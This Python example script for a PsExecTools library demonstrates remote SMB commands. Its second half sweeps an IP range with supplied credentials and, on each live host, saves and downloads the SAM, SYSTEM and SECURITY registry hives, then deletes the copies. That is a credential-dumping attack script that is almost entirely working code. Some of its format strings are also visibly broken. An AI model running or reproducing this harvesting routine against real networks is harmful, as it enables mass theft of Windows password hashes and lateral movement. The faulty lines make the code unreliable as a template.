#! /usr/bin/python # This file is part of PsExecTools. # Please see LICENSE for details. from PsExecTools import PsExecTools username = "" domain = "" password = "" target = "" psexec = PsExecTools(target, username, password, domain=domain) psexec.smb_mkdir("C:\\test\\") psexec.smb_mkdir_noClean("D:\\test_stays") psexec.command("cmd.exe /C dir C:\\") psexec.smb_clean() psexec.command("cmd.exe /C dir C:\\")
from netaddr import * username = "" domain = "" password = "" mytempdir = "C:\\mytempdir\\" OUTPUT_DIR="" ERROR_HOST = [] ips = IPNetwork("IP-RANGE-HERE") for host in ips: try: psexec = PsExecTools(str(host), username, password, domain=domain) if psexec.isHostAlive(): psexec.smb_mkdir("C:\\%s\\" % (mytempdir)) psexec.command("cmd.exe /C reg save HKLM\\SAM C:\\%s\\SAM & reg save HKLM\\SYSTEM C:\\%s\\SYSTEM & reg save HKLM\\SECURITY C:\\%s\\SECURITY" % (mytempdir, mytempdir, mytempdir)) psexec.smb_get_file("C:\\%s\\SAM", "%s/SAM_%s" % (mytempdir, OUTPUT_DIR, host)) psexec.smb_get_file("C:\\%s\\SYSTEM", "%s/SYSTEM_%s" % (mytempdir, OUTPUT_DIR, host)) psexec.smb_get_file("C:\\%s\\SECURITY", "%s/SECURITY_%s" % (mytempdir, OUTPUT_DIR, host)) psexec.smb_del_file("C:\\%s\\SAM" % (mytempdir)) psexec.smb_del_file("C:\\%s\\SYSTEM" % (mytempdir)) psexec.smb_del_file("C:\\%s\\SECURITY" % (mytempdir)) psexec.smb_clean()